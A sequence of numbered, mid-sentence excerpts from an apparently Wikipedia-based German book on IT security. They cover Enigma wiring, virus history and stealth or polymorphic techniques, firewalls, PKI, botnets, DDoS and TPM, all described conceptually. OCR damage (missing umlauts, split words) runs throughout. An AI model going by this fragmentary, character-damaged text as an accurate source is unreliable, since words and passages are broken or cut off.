387. mal nun von links nach rechts durchl uft Der Strom verl sst den Walzensatz wie er gekommen ist wieder ber die Eintrittswalze Die Tabelle auf der folgenden Seite zeigt das streng geheime Verdrah tungsschema der bei der Enigma I eingesetzten f nf drehbaren Walzen I bis V und der beiden Umkehrwalzen UKW B und UKW C 297 Kryptografie ABCDEFGHIJ LMNOPORSTUVWXYZ I EKMFLGDOVZNTOWYHXUSP BERCI EL AJDKSIRUXBLHWTMCOGZNPYFVOE TEIL BDFHJLCPRTXVZNYEIWGA USQO IV ESOVPZJAYQUIRHXLNFTG DCMWB V V Z RGITYUPSDNHLXAWMUOOFECK UKW B AY BR CU DH EQ FS GL IP JX KN MO TZ VW UKW C AF BV CP DJ EI GO HY KR LZ MX NW OT SU An der Ger tefront ist ein Steckerbrett mit doppelpoligen Steckbuchsen f r jeden der 26 Buchstaben angebracht Der Strom von der Buchstaben taste wird bevor er die Eintrittswalze erreicht ber dieses Steckerbrett gef hrt Nach Durchlaufen und Wiederverlassen des Walzensatzes flie t er ein zweites Mal ber das Steckerbrett und bringt schlie lich eine der 26 Buchstabenlampen zum Aufleuchten Funktion Der von der Batterie gelieferte Strom flie t ber die gedriickte Buchsta bentaste beispielsweise A zum Steckerbrett Ist dort die Buchse A mit einer anderen Buchse durch ein von au en angebrachtes Kabel verbunden gesteckert so wird A mit einem anderen Buchstaben beispielsweise J vertauscht Ist kein SES Kabel gesteckt ungesteckert Abb 36 Steckerbrett im Bild ist A mit J und S n
388. man gozilla Slashatdot Slick Slomox Smial Smurf Sneaker SniperBeamer Snoyes Sockenpuppe Softie Soronk Southpark Spaetabends Sparti Spauli Spawn Avatar Spirou44 Splattne Spongo Sprezza tura SPS Srbauer Stadtplandienst Stahlkocher Stalefish Ste ba Stefan h Stefan K hn Stefan Rueh rup Stefan Sch rli Stefan Selbach Stefan Hintz Stefan freimark de Stefan184 Stefan506 Stefan64 Stefanwege Steffen Steffen Lowe Gera STephan Kambor StephanKetz Stephen Dedalus Stern Ste veK Steven Malkovich StevenBusse Stf Stfn Stoerte Strabo Strunker Stupid girl Sturmbringer Stw StYxXx Subversiv action Supaari SuperFLoh Suricata Sven423 Swgreed Swisscarbon Swoon Swust Sypholux Systemdefender T W F T34 TA Tabacha Talaborn Tamino TamPam Tante ju Tarantella Taschenrechner T ater Tectower TekkenTec Temistokles Terabyte Terranic Th The undefined Theevilflow TheK TheNoOne Theodorix The pulse Thewob Thh Thiemo M ttig Thika Thire Thoken Thomas A Anderson Thomas Arensmann Thomas Fernstein Thomas G Graf Thomas Kaschwig Thomas S Thomas Springer Thomas Willerich Thomas05 ThomasHof mann ThomasSkora Thorbjoern Thiiringer Tibi Ticino2 Tiefflieger Tieno Tillwe Tilman Berger Tilo Tim Pritlove Timbeil Time Q Tinloaf Tischlampe Tischra Tiza Tmalsburg Toben Tobevi sion Tobias Bergemann TobiasEgg TobiasHerp Todeskugel Tody Togs Tohma Tom enemy Tom Knox TomK32 Tom
389. meldung bei Mail Web FTP oder IRC Servern kommen Einige Personal Firewalls filtern im Stealth Modus alle eingehenden Meldungen des Internet Control Message Protocols ICMP Besonders der Meldungstyp 3 Destination Unreachable transportiert jedoch wich tige Fehler und Kontrollnachrichten f r gewollte Internetverbindungen Dazu geh rt beispielsweise die Ermittlung der maximalen Paketgr e die ber ein Netzwerk bertragen werden kann Wird ICMP gefiltert kann es zu unerwarteten Netzproblemen kommen Interessanterweise kann die Strategie eingehende Anfragen nicht zu beantworten zu h herem Datenverkehr f hren Viele Anwendungen stel len die Anfrage n mlich erneut wenn sie keine Antwort oder Fehlermel dung erhalten Konfiguration Die Schutzwirkung die sich mithilfe einer Personal Fire wall erzielen l sst h ngt zu einem hohen Grad von deren sachgem en Konfiguration ab Die Grundeinstellungen eignen sich h ufig nicht f r den vom Benutzer gew nschten Einsatzzweck So stellt beispielsweise ein Fernwartungszu gang wie er von Kerio 2 in der Standardkonfiguration angeboten wird 101 Software beim Einsatz der Personal Firewall auf einem Einzelplatzrechner mit In ternetzugang nur ein unn tiges Risiko dar Die meisten aber keineswegs alle Produkte blockieren in den Grund einstellungen den Zugriff von au en auf die vom Rechner angebotenen Netzwerkdienste Bei der Tiny Personal Firewall muss diese Paketfilter
390. mmt der Antennengewinn als zus tzliche Verst rkung Besonders in Kombination mit leistungs starken Antennen ist hier Vorsicht geboten Die maximale Sendeleistung von 0 1 bzw 1 Watt bezieht sich auf die von der Antenne abgestrahlte Leistung F r eine Risikoabsch tzung ist der Abstand zum Sender wichtig Bei ungest rter Ausbreitung nimmt die Strahlleistung mit dem Quadrat des Abstands ab Das hei t dass beispielsweise die empfangene Leistung bei einem Meter Abstand von der Sendeantenne hundert mal h her ist als bei einem Abstand von zehn Metern Reichweite und Antennen Die Antennen handels blicher 802 11 Endger te lassen 30 bis 100 Meter Reichweite auf freier Fl che erwarten Mit neuester Technik lassen sich sogar 80 Meter in geschlossenen R umen erreichen Bessere WLAN Hardware sollte den Anschluss einer externen Anten ne erlauben Mit externen Rundstrahlantennen lassen sich bei Sichtkon takt 100 bis 300 Meter im Freien berbr cken Leichtbauw nde mindern die Reichweite sind aber einzeln kein Hin dernis dagegen werden Stahl und Beton nicht durchdrungen k nnen im Au enbereich aber experimentell als Reflektorwand dienen um Funkl 242 Wireless LAN cher auszuspiegeln B ume insbesondere dicht belaubte sind ebenfalls Hindernisse f r WLAN Verbindungen WLAN nach 802 11b maximal 11 Mbit s brutto oder 802 11g ma ximal 54Mbit s brutto funkt im 2 4 GHz Band Wellenl nge von 12 5 cm Damit werden alle Gegen
391. mputervirus Praktische Anf nge 1985 1990 Fred Cohen lieferte 1986 seine Dok torarbeit Computer Viruses Theory and Experiments ab Darin wurde ein funktionierendes Virus f r das Betriebssystem Unix vorgestellt Die ses gilt heute als das erste Computervirus Zwei Software H ndler aus Pakistan verbreiteten im Jahr 1986 das erste Virus f r das Betriebssystem MS DOS Das Programm war relativ harmlos da es nur das Inhaltsverzeichnis der befallenen Disketten in Brain umbenannte Ein Jahr sp ter 1987 erschien im Data Becker Verlag das erste Buch zum Thema Computerviren Das gro e Computervirenbuch von Ralf Burger Da Burger den Quellcode einiger Viren im Buch ver ffentlichte erschienen in den folgenden Monaten Dutzende Varianten des von ihm geschriebenen Virus in der ffentlichkeit 1988 erschien der erste Baukasten f r Viren Virus Construction Kit Damit ist es auch Anf ngern m glich Viren nach Ma zu erstellen Das Programm wurde f r den Computer Atari ST geschrieben In diesen Jahren wurden auch die ersten Antivirenprogramme her ausgebracht vor allem um gro e Firmen zu sch tzen Im Jahr 1989 er schien mit V2Px dann auch das erste polymorphe Virus das sich selbst immer wieder neu verschl sseln konnte und nur sehr schwer zu entde cken war Die ra der DOS Viren 1990 1995 In diesen Jahren wurden Viren im mer komplexer um sich weiter verbreiten zu k nnen und um sich besser gegen die Entdeckung durch Antivir
392. n Stealthviren ergreifen besondere Ma nahmen um ihre Existenz zu verschleiern So werden Systemaufrufe abgefangen so dass zum Bei spiel bei der Abfrage der Gr e einer infizierten Datei die Gr e vor der Infektion angegeben wird manche Viren ver ndern die urspr ng liche Gr e auch gar nicht weil sie sich in unbenutzte Bereiche der Da tei kopieren oder auch beim Lesen der Datei die Daten der urspr ng lichen Datei zur ckgeben 34 Computervirus Verschl sselte Viren verschl sseln sich selbst Der Schl ssel kann da bei von Infektion zu Infektion variieren Das soll Antivirenprogramme daran hindern einfach nach einer bestimmten Zeichenfolge in Dateien suchen zu k nnen Die Routine zum Entschl sseln muss aber naturge m in normaler Form vorliegen und kann von Antivirenprogrammen erkannt werden Polymorphe Viren ndern ihre Gestalt von Generation zu Generation teilweise vollkommen Das geschieht oft in Kombination mit Ver schl sselung hierbei wird eine variable Verschl sselung benutzt Ein Teil des Virus muss jedoch in unverschl sselter Form vorliegen um bei der Ausf hrung den Rest zu entschl sseln Um auch diesen Teil vari abel zu gestalten wird die Entschl sselungsroutine bei jeder Infektion neu erstellt Die Routine die die Entschl sselungsroutine immer neu erstellt befindet sich dabei selbst im verschl sselten Teil des Virus und kann zum Beispiel voneinander unabh ngige Befehle austauschen und Oper
393. n de Wert wird dann als Pr fsumme mitgespeichert bzw bertragen Der Empf nger der Nachricht kann aus den Daten ebenfalls eine Pr fsumme berechnen und diese mit der mit bertragenen Pr fsumme des Senders vergleichen Sind die beiden Pr fsummen unterschiedlich liegt ein ber tragungsfehler vor und die Nachricht muss wiederholt werden Sind die beiden Pr fsummen identisch ist die Nachricht mit hoher Wahrschein lichkeit korrekt bertragen worden Ein einfaches Beispiel f r eine Pr fsumme ist die Quersumme der Zif fern einer Zahl Pr fsummenverfahren die mit einer bestimmten Gewichtung der ein zelnen Summanden arbeiten sind recht sicher gegen ber zuf lligen Ver nderungen z B Zeichenvertauschungen verdopplungen oder auslas sungen Sie werden beispielsweise angewendet bei der ISBN International Standard Book Number und bei den EAN Codes Der Begriff Pr fsumme wird auch f r aufw ndigere Pr fverfahren ver wendet die komplexere Berechnungen anstelle der einfachen Aufsummierung der Datenwerte vornehmen so z B f r das CRC Verfahren Ein CRC verwen det statt einfacher Addition eine Polynomdivision und ist im Allgemeinen ef fektiver bei der Erkennung von Zufallsfehlern als eine primitive Pr fsumme Obwohl eine herk mmliche Pr fsumme n tzlich ist um vor unbeab sichtigten nderungen zu sch tzen bietet sie keine Sicherheit gegen ber beabsichtigen Daten nderungen Manipulation da sie trivial zu umge h
394. n gerseite werden dann E Mails von unbekannten Absendern von einem Filterprogramm wie SpamAssassin nur dann akzeptiert wenn sie mit g ltigen Briefmarken versehen sind Das hat zur Folge dass das massen hafte Versenden von E Mails erheblichen Mehraufwand bedeuten w rde w hrend der gelegentliche Versender kaum beeintr chtigt ist Ein Vorteil dieser Methode ist dass das berpr fen der G ltigkeit einer virtuellen Briefmarke mit im Vergleich zum Erzeugen der Briefmarke sehr wenig Rechenaufwand geschehen kann Ein Schwachpunkt ist dass T ter oh nehin nicht mehr ihre eigenen Rechner benutzen und daher auch mehr Rechenleistung zur Verf gung haben Die Erfahrung der letzten Jahre und auch die Tatsache dass soziale Probleme nicht durch technische Ans tze gel st werden k nnen lassen den Schluss zu dass das System E Mail in dieser Form in absehbarer Zu kunft nicht mehr l nger bestehen wird Diese Annahme wird unterst tzt durch die Vorkommnisse im April und Mai 2004 bei der Filter auf gr e ren Plattformen abgeschaltet beziehungsweise ma gebliche Funktiona lit ten des Mediums E Mail eingeschr nkt wurden um die um Faktoren gr er gewordene Mailflut in den Tagen davor berhaupt verarbeiten zu k nnen Beispiele hierf r sind die Ablehnung auch wichtiger Dateiarten beim Empfang von E Mail an der Freien Universit t Berlin beziehungs weise das komplette Abschalten von UBE und Wurm Virenfiltern bei der Bundesregierung oder der T
395. n Zertifizierungssmodell bei der sichere Anwendungen aufihre Legitimit t gepr ft w rden Daten von dieser unsicheren linken Seite gelangen ber einen speziel len Treiber auf dieser LeftHandSide dem Nexus Manager auf die Right HandSide Der Nexus pr ft die Daten dann im NAL Nexus Abstraction Layer dem Gegenst ck zum HAL Hardware Abstraction Layer Wei chen die Daten von den Erwartungen ab werden sie bereits hier verworfen Au erdem muss der Nexus sich selbst und die gesamte RightHandSide vor direkten Speicherzugriffen z B ber Busmaster f hige Ger te sch tzen LeftHandSide RightHandSide Unsicherer Modus Sicherer Modus Nexus Modus Abb 10 Aufteilung von Windows in eine unsichere und eine sichere Seite 115 Software N tige Hardware Der Preis f r die Abw rtskompatibilit t NGSCB ben tigt eine sichere Hardware Umgebung Eingabeger te momentan ist nur USB vorgese hen Grafikkarte Chipsatz CPU und ein sogenanntes TPM m ssen sicher sein Das hei t dass sie sich eindeutig am Rechner authentifizie ren m ssen Das k nnen vorhandene Ger te nicht leisten deswegen wird bereits neue Hardware mit entsprechenden neuen Treibern entwickelt die die geforderte Sicherheit garantieren Kritik Stecken in der Hardware eines durch das TPM ausgestatten PC ungesi cherte Komponenten so verweigern die nicht durch Nexus zertifizierten Anwendungen m glicherweise die Arbeit Auf diese Weise k nnten
396. n die von Organisationen ausgestellt werden deren Existenz und deren Integrit t nicht gew hrleistet ist Eine Aussage ber die Anforderungen die zur Ausstellung der Zertifikate erforderlich sind kann nur ber die jeweiligen Dokumente getroffen werden 141 PGP und Zertfikate Eine Alternative bietet das Web of Trust OpenPGP baut auf dieser Idee auf X 509 Zertifikate sind ebenfalls in der Lage ein Web of Trust abzu bilden z B Thawte Uber die Vertrauensw rdigkeit der einzelnen Nutz erzertifikate kann aber auch ein Web of Trust keine hundertprozentig sichere Aussage machen Um die Nutzbarkeit von Public Key Infrastrukturen zu erh hen und gleichzeitig eine qualitative Aussage ber Kommunikationspartner zu er zielen haben sich Bridge CA L sungen etabliert Quelle http de wikipedia org wiki Public Key Infrastruktur Historie 6 3 04 Angelegt von Pit72 danach bearbeitet von den Hauptautoren Pit72 TamPam GeorgGerber Thomas Springer Fuzzy Zwobot Steven Malkovich Lukrez Stf BWBot Kraude Duesentrieb Siehe auch L scher Michael chlistalla anonym 12 1 06 1 2 06 WikiPress Redaktion Digitales Zertifikat Digitale Zertifikate best tigen die Zugeh rigkeit eines kryptografischen Schl ssels zu einer Person Firma Institution z B bei der PGP Verschl sselung von Dateien oder E Mails einer Maschine z B bei der SSL Verschl sselung von Website Traffic Dadurch k nnen Authentizit t Vertraulichk
397. n E Mails nur aus Text zeichen Um Computern die Weiterleitung bzw die Darstellung zu erleich tern sind E Mails intern in zwei Teile geteilt Zum einen der Header mit dem f r Weiterleitung bzw Zustellung wesentlichen Teil zum ande ren der im Englischen message body genannte Teil mit dem eigentlichen Inhalt der Nachricht Header derKopfderE Mail Die Header genannten Kopfzeilen einer E Mail geben Auskunft ber den Weg den eine E Mail genommen hat und bieten Hinweise auf Absender Empf nger Datum der Erstellung und mehr Body der Inhalt der E Mail Der Body einer E Mail ist durch eine Leerzei le vom Header getrennt und enth lt die zu bertragenden Informationen in einem oder mehreren Teilen Eine E Mail darf gem RFC 2822 Abschnitt 2 3 nur Zeichen des 7 Bit ASCII Zeichensatzes enthalten Sollen andere Zeichen oder Daten wie zum Beispiel Bilder bertragen werden m ssen diese zuvor passend 183 Sonstige Themen kodiert werden Geregelt wird das durch RFC 2045 ff siehe auch MIME und base64 Aktuelle Mail Clients kodieren Text und Dateianh nge vgl unten bei Bedarf automatisch Neben dem klassischen Klartext werden teilweise Nachrichten auch als HTML Datei versandt teils ungewollt und unbewusst durch die Vorein stellung des Mail Clients teils bewusst um Textauszeichnungen verwen den zu k nnen Viele Empf nger lehnen HTML Mails allerdings ab da diese bei Verwendung von Javascript oder Nutzung anderer Ress
398. n Quadriat Fuzzy Perrak HvL Markobr Fabian Bieker Steven Malkovich Schaengel89 MFM Vlado ChristophDemmer Molily MichaelDiederich Aquin FlaBot Martin Otten Katonka Hashar PDD anonym 12 1 06 1 2 06 WikiPress Redaktion Zertifizierungsstelle Eine Zertifizierungsstelle engl Certificate Authority kurz CA ist eine Organisation die digitale Zertifikate herausgibt Ein digitales Zertifi kat ist gewisserma en das Cyberspace quivalent eines Personalausweises und dient dazu einen bestimmten ffentlichen Schl ssel einer Person oder Organisation zuzuordnen Diese Zuordnung wird von der Zertifi zierungsstelle beglaubigt indem sie sie mit ihrer eigenen digitalen Unter schrift versieht Die Zertifikate enthalten Schl ssel und Zusatzinformationen die zur Authentifizierung sowie zur Verschl sselung und Entschl sselung sensitiver oder vertraulicher Daten dienen die ber das Internet und an dere Netze verbreitet werden Als Zusatzinformationen sind zum Beispiel Lebensdauer Verweise auf Sperrlisten etc enthalten die durch die CA mit in das Zertifikat eingebracht werden Die Aufgabe einer Beglaubigungsinstitution ist es solche digitalen Zertifikate herauszugeben und zu berpr fen Sie ist dabei f r die Bereit stellung Zuweisung und Integrit tssicherung der von ihr ausgegebenen Zertifikate verantwortlich Damit ist sie ein wichtiger Teil der Public Key Infrastructure Eine Zertifizierungsstelle kann sowo
399. n Schl sselein stellungen berechnen Der Tagesschl ssel der Enigma besteht aus vier Teilschl sseln die in einem geheimen Formblatt hnlich wie in der folgenden Tabelle hier nur beispielhaft f r drei Monatstage angegeben waren Tag UKW Walzenlage Ringstellung Steckerverbindungen 31 B I IV III 16 26 08 AD CN ET FL GI JV KZ PU QY WX 30 B II V I 18 24 11 BN DZ EP FX GT HW IY OU QV RS 29 B III I IV 01 17 22 gt AH BL CX DI ER FK GU NP OQ TY Beispielsweise fiir den 31 des aktuellen Monats ist als Umkehrwalze UKW die Walze B einzusetzen Die Enigma I besa zwei Umkehrwal zen n mlich B und C Als drehbare Walzen Rotoren sind die Walzen I IV und III aus dem Sortiment von f nf Walzen I bis V auszuw hlen und in der vorgeschriebenen Reihenfolge Walze I links in die Enigma einzubauen Damit ist die Walzenlage definiert Zuvor sind die an den einzelnen Walzen befindlichen Einstellringe diese bestimmen den Buch staben an dem ein bertrag auf die n chste Walze geschieht noch in die angegebene Ringstellung zu bringen Hier war eine Buchstaben Zahlen Zuordnung A 01 B 02 Z 26 gebr uchlich Schlie lich sind an der Frontplatte der Enigma zehn Kabel zwischen den in der Spalte Stecker verbindungen verzeichneten Steckbuchsen anzuschlie en beispielsweise zwischen A und D und so weiter Als Letztes ist jede der drei Walzen durch den Benutzer in eine von 26 m glichen Anfangsstellungen zu drehen Damit definiert e
400. n Schutz gegen Internet Dialer integriert was zu diesem Zeitpunkt weltweit kein anderes Antivirenprogramm im Lieferumfang hatte Aufgrund dessen verlieh das Land Baden Wiirttem berg die Auszeichnung Innovation des Monats im Rahmen einer Mittel standsinitiative an den Hersteller Im Jahre 2004 setzten zahlreiche Unternehmen in aller Welt AntiVir ein und es gibt eine Version von AntiVir welche unter Linux l uft Wei terhin werden neben den verschiedenen Windows Varianten mittlerweile auch OpenBSD FreeBSD und Solaris unterstiitzt Die Funktionen AntiVir erkennt und entfernt nach Aussage des Herstellers ber 260 000 Viren wehrt Trojaner W rmer und Backdoors ab und sch tzt vor kosten verursachenden Einwahlprogrammen den Dialern Infizierte Dateien sollen in den meisten F llen repariert werden k nnen Integriert ist ein fakultativ st ndig aktiver Virenw chter zur Real Time berwachung der T tigkeiten auf dem Computer Sobald auf eine Datei zugegriffen werden soll die der W chter f r schadhaft h lt gibt er eine Warnung aus und verhindert die Ausf hrung der sch dlichen Rou tine Dabei kann das Programm auf eine Heuristik Funktion zum Schutz vor bislang unbekannten Viren zur ckgreifen Wie bei jedem Antivirenprogramm h ngt die Sicherheit des Nutzers stark von der Aktualit t des eingesetzten Programms ab Der Hersteller H BEDV stellt aufgrund dessen in unregelm igen Abst nden mehrmals t glich neue Virendefinitions
401. n digitalem Wissen keine Sicherheit DRM macht eine faire Nutzung schwierig In vielen L ndern geht jedes urheberrechtlich gesch tzte Werk nach einer bestimmten Frist in die Public Domain ber Das hei t nach Ab lauf dieser Frist darfjedermann Werke frei kopieren und sie verkaufen auf dieser rechtlichen Tatsache basiert auch die 191ler Ausgabe der Encyclopedia Britannica die in Wikipedia enthalten ist Doch bislang erlaubt kein einziges DRM System eine solche Freigabe von bisher ur heberrechtlich gesch tzten Werken Schweiz Art 29 33 Auch ist es dem Besitzer einer CD oder DVD erlaubt zum eigenen Ge brauch Kopien herzustellen z B eine separate CD f r das Autoradio oder eine Kopie des Kinderfilms Bibliotheken Schulen und anderen Bildungseinrichtungen ist es auch gestattet f r Wissenschafts und Ausbildungszwecke Kopien zu erstellen DRM Systeme machen jede dieser legalen Nutzungen zumindest schwieriger Literatur Becker Eberhard Buhse Willms G nnewig Dirk Rump Nils Di gital Rights Management Technological Economic Legal and Political Aspects ISBN 3 540 40465 1 Fr nkl Gerald Digital Rights Management in der Praxis ISBN 3 936755 93 0 Generotzky Christoph Nieland Stefan Weigand Carsten Digi tal Rights Management Technologien f r legale Musikdownloads ISBN 3 8322 1440 2 Hansen Markus M ller Jan Digital Rights Management zwischen Si cherheit und informationeller Selbstbestimmung In IT
402. n mit bekommen Dabei existieren immer ein so genannter Hub Bot sowie Leaf Bots Der Hub Bot kontrolliert alle anderen Bots wobei sich durchaus alternative Hub Bots festlegen lassen welche bei einem eventuellen Ausfall des Real Hubs als Alternative genutzt werden k nnen Die Gefahr die von Botnets ausgeht ist extrem hoch da die von ih nen ausgef hrten DDoS Attacken und Spam Nachrichten eine enorme Bedrohung f r Anbieter von Internetdiensten jeglicher Art darstellen Das Hauptpotenzial von Botnets besteht darin dass die Netzwerke Gr en von tausenden Rechnern erreichen k nnen deren Bandbreitensum me die der meisten herk mmlichen Internetzug nge sprengt Somit ist es einem Botnet von ausreichender Gr e durch Senden von immensen Datenmengen m glich die Anbindungen der attackierten Serviceanbie ter zu verstopfen Da die Netze meistens aus bernommenen Heim PCs aus verschiedensten Regionen und somit breitem IP Adressenspektrum bestehen k nnen die betroffenen Anbieter nur bedingt mit Schutzma nahmen wie Paketfiltern vorgehen Das bisher gr te beobachtete IRC Botnet wurde vom Computer Emer gency Response Team des Rechenzentrums der Universit t Stuttgart ent deckt und hatte eine Gr e von 140 415 Bots Quelle http de wikipedia org wiki Botnet Historie 13 10 04 Anonym angelegt danach bearbeitet von den Hauptautoren The undefined Randbewohner HenrikHolke Srbauer Steven Malkovich anonym 12 1 06 1 2 06 W
403. n rufen bei den betroffenen Webseiten in der Regel Sch den in H he von 5 oder 6 stelligen Eurobetr gen hervor und vernichten oftmals jahrelange Arbeit da selbstverst ndlich von dem System kein Backup existiert DDoS Angriffe werden daher in aller Regel zur Anzeige gebracht identifizierte T ter gerichtlich verfolgt abgeurteilt und zu voll st ndigem Schadensersatz herangezogen Im weiteren Sinn sind Denials of Service auch au erhalb der digitalen Welt zu finden So haben das massenhafte Stellen von Antr gen z B aus Unzufriedenheit mo tiviert Boykotts insbesondere Kaufboykotts oder auch Streiks insbesondere Generalstreiks durchaus die Wirkung einer Denial of Service Quelle http de wikipedia org wiki Denial_of_Service Historie 24 1 03 Anonym angelegt danach bearbeitet von den Hauptautoren Matthyk Lothar Kimmeringer Fgb OWeh DanielP Sven423 Don Quichote Diddi MichaelDiederich D SniperBeamer OderWat Mikue Cherubino Moewe Steven Malkovich Achim Raschka Kurt Jansson Triton YurikBot Nicog Gulli Remi Jailbird Merkel RobotQuistnix Gauss anonym 12 1 06 1 2 06 WikiPress Redaktion 211 Angriffe Defacement Defacement engl f r Entstellung oder Verunstaltung bezeichnet in der EDV das unberechtigte Ver ndern einer Website Meistens betrifft das die Einstiegsseite Normalerweise werden Sicherheitsl cken in Web servern ausgenutzt oder Passw rter durch Methoden wie Brute Force
404. n und Techniken um Informationen aus verschl sselten Texten zu ge winnen Diese Informationen k nnen sowohl der verwendete Schl ssel wie auch der Originaltext sein Kryptoanalyse ist der Gegenspieler der Kryptografie Beide sind Teilgebiete der Kryptologie Lange Zeit besch ftigten sich haupts chlich Mathematiker mit der Kryptologie Mit der Verbreitung von Computern sind Kryptologen im mer auch zu einem gewissen Teil Informatiker Ein wichtiger Ansatz ist wiederkehrende Muster zu erkennen und zus tzliches Wissen aus So cial Engineering So konnte etwa die Enigma mit einem anf nglichen Wissen geknackt werden dass am Anfang zweimal der Schl ssel f r den Rest der Nachricht verschl sselt mit einem unbekannten Tagesschl ssel und anschlie end das Datum und der Wetterbericht gesendet wurde Man konnte damit den Tagesschl ssel rekonstruieren Bevor mechanische Apparate wie die Enigma oder Computer der Kryp tografie erm glichten Nachrichten zu Pseudo Zufallsfolgen zu verw r feln war die Statistik die st rkste Waffe um Nachrichten zu entschl sseln Solange ein Mensch die Texte von Hand verschl sselt muss der verwen dete Algorithmus einfach genug bleiben um die Nachricht in vertretbarer Zeit fehlerfrei umzusetzen Diese Verschl sselungsverfahren sind durch die Statistik angreifbar Mit ihr wird die H ufigkeit bestimmter Zeichen und Zeichenfolgen bestimmt Mit dem Wissen ber die Gesetzm igkei ten einer Sprach
405. n z B die Program 12 Computersicherheit me Internet Explorer und Outlook Express von Microsoft immer wieder durch sicherheitskritische L cken auf Bei Servern sind dies hingegen Sendmail ein Mailserver oder auch BIND ein DNS Server Wichtig ist dass die Konfiguration der genutzten Software an die jewei ligen Bed rfnisse angepasst wird So ist es bei vielen an das Internet ange schlossenen Rechnern nicht n tig dass auf ihnen Server Programme laufen Da Server Dienste von vielen Betriebssystemen in der Standardinstallation geladen werden schlie t man mit deren Deaktivierung eine Reihe wichtiger Angriffspunkte Viele Programme erlauben eine individuelle Konfiguration unter Sicherheitsaspekten und die Einrichtung von Zugriffsbeschr nkungen Au erdem ist es von Bedeutung sich ber Schwachstellen in der eingesetzten Software zu informieren und regelm ig Aktualisierungen einzuspielen Zur Computersicherheit geh rt nicht nur der pr ventive Einsatz tech nischer Werkzeuge wie beispielsweise Firewalls Intrusion Detection Systeme etc sondern auch ein organisatorischer Rahmen in Form durch dachter Grunds tze Policy Strategie die den Menschen als Anwender der Werkzeuge in das System einbeziehen Allzu oft gelingt es Hackern durch Ausnutzung eines zu schwachen Kennworts oder durch so ge nanntes Social Engineering Zugang zu sensiblen Daten zu erlangen Der Mangel an Computersicherheit ist eine vielschichtige Bedrohun
406. nal Firewall 2006 f r Windows 98 und ME Norton Personal Firewall 2005 sowie f r Mac OS 9 und OS X Nor ton Personal Firewall 3 0 for Macintosh Historischer Vorl ufer der Norton Personal Firewall ist die Personal Firewall AtGuard von WRQ die als Freeware zur Verf gung stand Sym antec kaufte 1999 AtGuard von WRQ Der Name Norton wird von Sym antec als Konsumentenmarke benutzt Er geht auf den Hersteller des Nor ton Commanders die Firma Peter Norton Computing zuriick die 1990 von Symantec gekauft wurde Im Usenet berichten Anwender dass die Software viele Ressourcen ben tigt Auch von Schwierigkeiten bei der Deinstallation wird haufig berichtet Weitere bekannte Personal Firewalls f r Windows AT Guard iSafer Open Source Norman Personal Firewall Outpost Sygate Personal Firewall Support eingestellt Tiny Personal Firewall 104 Personal Firewall Linux und andere Unix hnliche Betriebssysteme Ein Computer auf dem Unix oder ein Unix Derivat als Betriebssystem eingesetzt wird l sst sich ebenfalls durch einen hostbasierten Paketfilter absichern Viele f r Personal Firewalls typische Funktionen lassen sich mit Software hervor rufen die f r Unix erh ltlich ist FreeBSD bringt mit dem Skript rc firewall einen vorgefertigten Regel satz f r den Paketfilter IPFirewall ipfw mit F r den Schutz eines Ein zelplatzrechners mit Internetzugang kann das rc firewall Skript mit der Option client aufgerufen werden
407. nd Auslagerung binding wrapping Das TPM kann Schl ssel auch au erhalb des Trust Storage z B auf der Festplatte speichern Diese wer den ebenfalls in einem Schl ssel Baum organisiert und deren Wurzel mit einem Key im TPM verschl sselt Somit ist die Anzahl der sicher gespei cherten Schl ssel nahezu unbegrenzt Schutz kryptografischer Schl ssel Schl ssel werden innerhalb des TPMs erzeugt benutzt und sicher abgelegt Sie m ssen dieses also nie verlassen Dadurch sind sie vor Software Angriffen gesch tzt Vor Hard ware Angriffen besteht ebenfalls ein relativ hoher Schutz Sicherheit ist mit Smartcards vergleichbar Auch sind die TPMs so hergestellt dass eine physische Manipulation die unweigerliche Zerst rung der Daten zur Folge hat Beglaubigung attestation Trusted Party TP Der Nutzer kann seine erzeugten AIKs von einer Trusted Third Party z B einer Privacy CA signieren lassen Dazu muss er die bei der Erzeugung des TPM erstell ten Zertifikate EK Credential TCPA Conformity Certificate Platform Credential ebenfalls an die TP schicken Diese kann einen AIK eindeutig einer Person zuordnen womit sich diese gegen ber Dritten eindeutig als Besitzer einer TPM Plattform verifizieren lassen kann Direct Anonymous Attestation DAA Bei dieser erst mit der TCG Spezifikation 1 2 eingef hrten Technik die auf Intels Direct Proof auf baut l sst sich durch ein komplexes mathematisches Verfahren spezielles Gruppen
408. nd Ab senderauthentifizierung Hierzu existieren unter anderem die Verfahren PGP und dessen freie Variante GnuPG sowie S MIME vorwiegend im B2B Bereich die jedoch noch nicht besonders weit verbreitet sind Selbst solche Verschl sselungsverfahren decken lediglich den Inhalt der E Mail ab nicht die Betreff Zeile oder das E Mail Datum Dadurch k nnen unter Umst nden R ckschl sse auf den Inhalt einer verschl sselten Mail gezo gen werden Beweiskraft E Mails haben wenig Beweiskraft da der Sender bei den herk mmlichen Protokollen und Log Mechanismen keine M glichkeit hat zu beweisen wann er was an wen versendet hat und ob der Empf nger die E Mail erhalten hat Durch eine elektronische Signatur und vor al lem durch eine qualifizierte elektronische Signatur k nnen allerdings im Rechtsverkehr Zivilrecht Verwaltungsrecht Verbindlichkeiten geschaf fen werden die auch vor Gericht Bestand haben Umgangssprachlich wird dann von einer digitalen Unterschrift gesprochen Das verbindliche Setzen eines Zeitstempels wird unter bestimmten Voraussetzungen eben falls anerkannt N heres wird im Signaturgesetz geregelt Den Empfang der Nachricht kann eine Signatur allerdings nicht beweisen hierzu ist bei spielsweise eine idealerweise ebenfalls signierte Antwort notwendig Einige Dienstleister bieten L sungen an die Signatur Verschl sselung und Antwort automatisieren zum Beispiel E Mail Frachtdienst genannt Laufzeit E Mail wu
409. nd Wurm Computerviren und w rmer verbreiten sich beide auf Rechnersystemen doch basieren sie zum Teil auf vollkommen verschiedenen Konzepten und Techniken Ein Virus verbreitet sich indem es sich selbst in noch nicht infizierte Dateien kopiert und diese ggf so anpasst dass das Virus ausgef hrt wird wenn das Wirtsprogramm gestartet wird Zu den infizierbaren Dateien z hlen normale Programmdateien Programmbibliotheken Skripten Do kumente mit Makros oder anderen ausf hrbaren Inhalten sowie Bootsek toren auch wenn Letztere normalerweise vom Betriebssystem nicht als Datei repr sentiert werden Die Verbreitung auf neue Systeme erfolgt durch versehentliches gele gentlich auch absichtliches Kopieren einer infizierten Wirtsdatei auf das neue System durch einen Anwender Dabei ist es unerheblich auf welchem Weg diese Wirtsdatei kopiert wird Fr her waren die Hauptverbreitungs wege Wechselmedien wie Disketten heute sind es Rechnernetze z B via E Mail zugesandt von FTP Servern Web Servern oder aus Tauschb rsen heruntergeladen Es existieren auch 